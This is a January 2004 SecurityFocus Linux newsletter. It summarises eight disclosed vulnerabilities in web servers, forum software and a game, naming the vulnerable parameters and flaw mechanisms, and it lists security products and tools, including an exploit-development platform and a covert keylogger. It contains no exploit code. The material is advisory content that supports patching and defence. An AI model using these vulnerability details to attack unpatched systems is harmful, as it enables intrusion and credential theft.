Date: Mon, 5 Jan 2004 15:20:43 -0700 (MST)
From:"John Boletta" <jboletta@securityfocus.com>&
To:linux-secnews@securityfocus.com
Subject: SecurityFocus Linux Newsletter #165

SecurityFocus Linux Newsletter #165
------------------------------------
This Issue Sponsored by: RSA Conference 2004

Network with over 10,000 of the brightest minds in information security 
at
the largest, most highly-anticipated industry event of the year. Don't
miss RSA Conference 2004! Choose from over 200 class sessions and see
demos from more than 250 industry vendors. If your job touches 
security,
you need to be here. Learn more or register at:
http://www.securityfocus.com/sponsor/RSA_linux-secnews_031117 and use
priority code SF4.

------------------------------------------------------------------------

I. FRONT AND CENTER
     1. Checklist for Deploying an IDS
II. LINUX VULNERABILITY SUMMARY
     1. Surfboard httpd Remote Buffer Overflow Vulnerability
     2. OpenBB Index.PHP Remote SQL Injection Vulnerability
     3. OpenBB Board.PHP Cross-Site Scripting Vulnerability
     4. MiniBB Profile Website Name HTML Injection Vulnerability
     5. phpBB GroupCP.PHP SQL Injection Vulnerability
     6. John Sage ACK_hole01 Potential Remote Heap Buffer Overrun Vu...
     7. PHPCatalog ID Parameter SQL Injection Vulnerability
     8. XSOK GunZip Path Environment Variable Local Command Executio...
III. LINUX FOCUS LIST SUMMARY
     1. skey not updating for one time passwords (Thread)
     2. UNIX Authentication (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
     1. Immunity CANVAS
     2. SecretAgent
     3. Cyber-Ark  Inter-Business Vault
     4. EnCase Forensic Edition
     5. KeyGhost SX
     6. SafeKit
V. NEW TOOLS FOR LINUX PLATFORMS
     1. GNUnet v0.6.1a
     2. Yin Yang  v1.0
     3. Quick Spam Filter v0.9.12
     4. System Garden Habitat  v0.17.5
     5. Portfwd v0.26
     6. Helios qmail   v0.6.1
VI. UNSUBSCRIBE INSTRUCTIONS
VII. SPONSOR INFORMATION


I. FRONT AND CENTER
-------------------
1. Checklist for Deploying an IDS
By Andy Cuff

The scope of this article considers the worst case scenario, that of
deploying a Network IDS on a remote network (target). The introduction 
of
an IDS into a organization's network can be sensitive and often has
political implications with the network staff, and thus a checklist
written
from the perspective of an outside consultant (even if the IDS is 
deployed
internally) that appeases all parties can be useful to ensure a 
successful
implementation.

http://www.securityfocus.com/infocus/1754


II. LINUX VULNERABILITY SUMMARY
-------------------------------
1. Surfboard httpd Remote Buffer Overflow Vulnerability
BugTraq ID: 9299
Remote: Yes
Date Published: Dec 26 2003
Relevant URL: http://www.securityfocus.com/bid/9299
Summary:
Surfboard is a freely available web server implementation for 
Unix/Linux
variants.

A vulnerability has been identified in Surfboard web server when 
handling
certain URL requests. Because of this, it may be possible for a remote
attacker to gain unauthorized access to a system running the vulnerable
software. The condition is present due to insufficient boundary 
checking.

The issue presents itself when an attacker sends a specially crafted 
URL
request with more than 1024 characters to the server daemon.  Immediate
consequences of an attack may result in a denial of service condition.

An attacker may leverage the issue by exploiting an unbounded memory 
copy
operation to overwrite the saved return address/base pointer, causing 
an
affected procedure to return to an address of their choice. Successful
exploitation of this issue may allow an attacker to execute arbitrary 
code
in the context of the vulnerable software in order to gain unauthorized
access, however, this has not been confirmed at the moment.

Surfboard version 1.1.9 has been reported to be prone to this issue,
however, other versions may be affected as well.

2. OpenBB Index.PHP Remote SQL Injection Vulnerability
BugTraq ID: 9300
Remote: Yes
Date Published: Dec 26 2003
Relevant URL: http://www.securityfocus.com/bid/9300
Summary:
OpenBB is a freely available, open source bulletin board software 
package.
It is available for Unix, Linux, and Microsoft Windows operating 
systems.

A problem with the software may make it possible for remote users to
modify database query logic.

It has been reported that OpenBB does not properly check input passed 
via
the 'CID' parameter of 'index.php' script.  Because of this, it may be
possible for a remote user to inject malicious arbitrary SQL queries in
the context of the database user for the bulletin board software.  The
consequences of successful exploitation will vary depending on the
underlying database implementation, but may allow for disclosure of
sensitive information such as administrator passwords or remote 
compromise
of the bulletin board or database itself.

OpenBB 1.06 has been reported to be prone this issue, however, other
versions could be affected as well.

This issue may be related to BID 7401.

3. OpenBB Board.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 9303
Remote: Yes
Date Published: Dec 27 2003
Relevant URL: http://www.securityfocus.com/bid/9303
Summary:
OpenBB is a freely available, open source bulletin board software 
package.
It is available for Unix, Linux, and Microsoft Windows operating 
systems.

OpenBB is prone to a cross-site scripting vulnerability in the 
'board.php'
script. The source of the problem is that HTML and script code are not
adequately sanitized from input supplied via the 'FID' URI parameter. 
This
input will be included in dynamically generated web pages. A remote
attacker could exploit this issue by embedding hostile HTML and script
code in a malicious link to the vulnerable script. The 
attacker-supplied
code will be rendered in the browser of an unsuspecting user who 
follows
the link, code execution would occur in the context of the site hosting
the vulnerable software.

Exploitation could allow for theft of cookie-based authentication
credentials. Other attacks are also possible.

It should be noted that although this vulnerability has been reported 
to
affect OpenBB 1.06 other versions might also be affected.

4. MiniBB Profile Website Name HTML Injection Vulnerability
BugTraq ID: 9310
Remote: Yes
Date Published: Dec 29 2003
Relevant URL: http://www.securityfocus.com/bid/9310
Summary:
miniBB is web forum software. It is written in PHP and will run on most
Unix and Linux variants as well as Microsoft Windows operating systems.

miniBB is prone to an HTML injection vulnerability.  The vulnerability
exists in the 'bb_edit_prf.php' script but is exposed via the
'bb_func_usernfo.php' script, which provides the interface for editing
user profiles.  The source of the issue is that 'bb_func_usernfo.php' 
does
not sufficient sanitize input supplied via the 'website name' field of
user profiles.  This issue could permit registered users to inject 
hostile
HTML and script code into the 'website name' field of their user 
profile,
which would be rendered by other web users when the user profile is
viewed.

This could be exploited to steal cookie-based authentication 
credentials.
It is also possible to use this type of vulnerability as an attack 
vector
to exploit latent browser security flaws.

5. phpBB GroupCP.PHP SQL Injection Vulnerability
BugTraq ID: 9314
Remote: Yes
Date Published: Dec 29 2003
Relevant URL: http://www.securityfocus.com/bid/9314
Summary:
phpBB is an open-source web forum application that is written in PHP 
and
supported by a number of database products. It will run on most Unix 
and
Linux variants, as well as Microsoft Windows operating systems.

A vulnerability has been reported to exist in the software that may 
allow
a remote user who has group moderator privileges to inject malicious 
SQL
syntax into database queries. The problem reportedly exists in the 
$sql_in
parameter of the groupcp.php script. This issue is caused by 
insufficient
sanitization of user-supplied data. A remote attacker may exploit this
issue to influence SQL query logic to have unauthorized SQL queries
executed in the database.

A malicious user may influence database queries in order to view or 
modify
sensitive information potentially compromising the software or the
database.

6. John Sage ACK_hole01 Potential Remote Heap Buffer Overrun Vu...
BugTraq ID: 9315
Remote: Yes
Date Published: Dec 28 2003
Relevant URL: http://www.securityfocus.com/bid/9315
Summary:
John Sage ACK_hole01 is a TCP/IP network data sink for Unix and Linux
platforms.

ACK_hole01 has been reported prone to a remote heap overrun 
vulnerability.
The issue presents itself because the size_t integer variable 'bytes' 
used
to limit data that is read into a heap based buffer, using a read() 
call,
is not properly initialized. As a result of this flaw, the 'bytes'
variable will be assigned a value based on random data on the stack. 
When
this variable is later used as the count argument for a read() call,
excessive attacker-supplied data may be read from a network socket
descriptor into a reserved buffer in the heap.

Because of the nature of this issue, the vulnerability may only present
itself if the 'bytes' integer contains a sufficient value, so that data
read exceeds the size of the reserved buffer. An attacker may 
potentially
exploit this issue to corrupt inline heap memory management chunk 
headers
that are adjacent to the affected buffer. Exploitation of the issue may 
be
hindered because free() is not called on an affected adjacent chunk; 
this,
however, has not been confirmed, as other heap exploitation vectors may 
be
plausible.

7. PHPCatalog ID Parameter SQL Injection Vulnerability
BugTraq ID: 9318
Remote: Yes
Date Published: Dec 29 2003
Relevant URL: http://www.securityfocus.com/bid/9318
Summary:
PHPCatalog is expandable web based e-catalog software implemented in 
PHP.
It will run on most Unix and Linux variants, as well as Microsoft 
Windows
operating systems.

A vulnerability has been reported to exist in the software that may 
allow
a remote user to inject malicious SQL syntax into database queries. The
problem reportedly exists in the $id parameter of PHPCatalog. This 
issue
is caused by insufficient sanitization of user-supplied data supplied 
as
input to this parameter, which will then be included in a database 
query.
A remote attacker may exploit this issue to influence SQL query logic 
to
have unauthorized SQL queries executed in the database.

A malicious user may influence database queries in order to view or 
modify
sensitive information potentially compromising the software or the
database.

This vulnerability has been reported to affect PHPCatalog version 2.6.7
and prior versions.

8. XSOK GunZip Path Environment Variable Local Command Executio...
BugTraq ID: 9321
Remote: No
Date Published: Dec 30 2003
Relevant URL: http://www.securityfocus.com/bid/9321
Summary:
xsok is a freely available, open source single player game.  It is
available for the Linux platform.

A problem has been disclosed in the handling of user-supplied input in
xsok.  Because of this, an attacker may be able to gain elevated
privileges on a host with the vulnerable program.

The problem is in the handling of the GUNZIP_PATH environment variable.
It is possible for an attacker to modify the environment variable,
allowing the attacker to change the search path that the program 
follows
to find the gunzip executable.  Vulnerable versions of the program do 
not
drop privileges before executing the gunzip executable.  By altering 
the
path and supplying commands contained in a malicious program with the 
name
gunzip, attackers are able to execute arbitrary commands with the
privileges of the Group-ID games.


III. LINUX FOCUS LIST SUMMARY
-----------------------------
1. skey not updating for one time passwords (Thread)
Relevant URL:

http://www.securityfocus.com/archive/91/348737

2. UNIX Authentication (Thread)
Relevant URL:

http://www.securityfocus.com/archive/91/348629


IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. Immunity CANVAS
By: Immunity, Inc.
Platforms: Linux, Windows 2000
Relevant URL: http://www.immunitysec.com/CANVAS/
Summary:

Immunity CANVAS is 100% pure Python, and every license includes full
access to the entire CANVAS codebase. Python is one of the easiest
languages to learn, so even novice programmers can be productive on the
CANVAS API, should they so chose.

Immunity CANVAS is both a valuable demonstration tool for enterprise
information security teams or system adminstrators, and an advanced
development platform for exploit developers, or people learning to 
become
exploit developers.

2. SecretAgent
By: Information Security Corporation (ISC)
Platforms: Linux, MacOS, UNIX, Windows 2000, Windows 95/98, Windows NT,
Windows XP
Relevant URL: 
http://www.infoseccorp.com/products/secretagent/contents.htm
Summary:

SecretAgent is a file encryption and digital signature utility, 
supporting
cross-platform interoperability over a wide range of platforms: 
Windows,
Linux, Mac OS X, and UNIX systems.

It's the perfect solution for your data security requirements, 
regardless
of the size of your organization.

Using the latest recognized standards in encryption and digital 
signature
technology, SecretAgent ensures the confidentiality, integrity, and
authenticity of your data.

3. Cyber-Ark  Inter-Business Vault
By: Cyber-Ark
Platforms: Linux, Windows 2000, Windows NT, Windows XP
Relevant URL:
http://www.cyber-ark.com/datasecuritysoftware/inter-business_vault.htm
Summary:

Based on Cyber-Ark Software's Vaulting Technology, the Inter-Business
Vault, an information security solution that enables organizations to
safely overcome traditional network boundaries in order to securely 
share
business information among customers, business partners, and remote
branches. It provides a seamless, LAN-like experience over the Internet
that includes all the security, performance, accessibility, and ease of
administration required to allow organizations to share everyday
information worldwide. To learn more about these core attributes of the
Inter-Business Vault click on the relevant link below:

4. EnCase Forensic Edition
By: Guidance Software Inc.
Platforms: DOS, FreeBSD, Linux, MacOS, NetBSD, OpenBSD, PalmOS, 
Solaris,
UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.guidancesoftware.com/products/EnCaseForensic/index.shtm
Summary:

EnCase Forensic Edition Version 4 delivers the most advanced features 
for
computer forensics and investigations. With an intuitive GUI and 
superior
performance, EnCase Version 4 provides investigators with the tools to
conduct large-scale and complex investigations with accuracy and
efficiency. Guidance Software?s award winning solution yields 
completely
non-invasive computer forensic investigations while allowing examiners 
to
easily manage large volumes of computer evidence and view all relevant
files, including "deleted" files, file slack and unallocated space.

The integrated functionality of EnCase allows the examiner to perform 
all
functions of the computer forensic investigation process. EnCase's
EnScript, a powerful macro-programming language and API included within
EnCase, allows investigators to build customized and reusable forensic
scripts.

5. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000, 
Windows
95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary:

KeyGhost SX discreetly captures and records all keystrokes typed,
including chat conversations, email, word processor, or even activity
within an accounting or specialist system. It is completely 
undetectable
by software scanners and provides you with one of the most powerful
stealth surveillance applications offered anywhere.

Because KeyGhost uses STRONG 128-Bit encryption to store the recorded 
data
in it?s own internal memory (not on the hard drive), it is impossible 
for
a network intruder to gain access to any sensitive data stored within 
the
device.

6. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary:

Evidian's SafeKit technology makes it possible to render any 
application
available 24 hours per day. With no extra hardware: just use your 
existing
servers and install this software-only solution.

This provides ultimate scalability. As your needs grow, all you need to 
do
is add more standard servers into the cluster. With the load balancing
features of SafeKit, you can distribute applications over multiple
servers. If one system fails completely, the others will continue to 
serve
your users.


V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. GNUnet v0.6.1a
By: Christian Grothoff
Relevant URL: http://www.ovmj.org/GNUnet/
Platforms: FreeBSD, Linux, NetBSD, OpenBSD, POSIX
Summary:

GNUnet is a peer-to-peer framework with focus on providing security. 
All
link-to-link messages in the network are confidential and 
authenticated.
The framework provides a transport abstraction layer and can currently
encapsulate the peer-to-peer traffic in UDP, TCP, or SMTP messages. 
GNUnet
supports accounting to provide contributing nodes with better service. 
The
primary service build on top of the core GNUnet framework is anonymous
file sharing.

2. Yin Yang  v1.0
By: primac
Relevant URL: http://yinyang.sourceforge.net
Platforms: Linux
Summary:

Yin Yang is a real-time Linux file scanner that is activated whenever a
file is accessed. When a file opening system call is detected, it will
send the full pathname of the file to a network daemon. The network 
daemon
will then pass the pathname of the file to a file scanner, such as an
anti-virus scanner, and return the status. The status will then be
reported back to the network daemon, and the response will be passed 
back
to the system call. The default action logs a message to the system
logger. The file scanner is wrapped with the original file opening 
system
call, so it will open the file normally after the file scanning.

3. Quick Spam Filter v0.9.12
By: Andrew Wood
Relevant URL: http://www.ivarch.com/programs/qsf.shtml
Platforms: Linux, POSIX
Summary:

Quick Spam Filter is a small, fast spam filter that works by learning 
to
recognise the words that are more likely to appear in spam than 
non-spam.
It is intended to be used in a procmail recipe to mark email as being
possible spam.

4. System Garden Habitat  v0.17.5
By: Nigel Stuckey
Relevant URL: http://www.systemgarden.com/habitat
Platforms: Linux
Summary:

Habitat is a performance management system which captures, stores, and
visualises table-based time series data. Monitor probes exist for Linux
and Solaris with Windows coming soon. It has a command line interface, 
a
fast GUI client for graphical visualisation, and a simple format for
extending data capture in the agent. It is written in C with Gtk and 
can
access data from its peers directly, by file sharing, or with the use 
of a
separate central archiving repository (harvest) to scale to 
installations
of significant size.

5. Portfwd v0.26
By: Everton da Silva Marques, evertonm@my-deja.com
Relevant URL: http://sourceforge.net/projects/portfwd/
Platforms: FreeBSD, Linux, NetBSD, OpenBSD, Solaris
Summary:

Portfwd is a small C++ utility which forwards incoming TCP connections
and/or UDP packets to remote hosts. Multiple forwarders can be 
specified
in a flexible configuration file. There is support for FTP forwarding.

6. Helios qmail   v0.6.1
By: Paul Foremski
Relevant URL: http://sourceforge.net/projects/helios-qmail/
Platforms: FreeBSD, Linux, NetBSD, OpenBSD, POSIX, UNIX
Summary:

Helios qmail is an advanced qmail distribution based on qmail-sql. It
supports SMTP, SMTPS, POP3, POP3S, IMAP, and IMAPS services. It also
features antivirus and antispam filters, antispoof, SMTP-AUTH,
SMTP-after-POP/IMAP, a PHP5 API, and many other useful tools.

VII. SPONSOR INFORMATION
-----------------------
This Issue Sponsored by: RSA Conference 2004

Network with over 10,000 of the brightest minds in information security 
at
the largest, most highly-anticipated industry event of the year. Don't
miss RSA Conference 2004! Choose from over 200 class sessions and see
demos from more than 250 industry vendors. If your job touches 
security,
you need to be here. Learn more or register at:
http://www.securityfocus.com/sponsor/RSA_linux-secnews_031117 and use
priority code SF4.

------------------------------------------------------------------------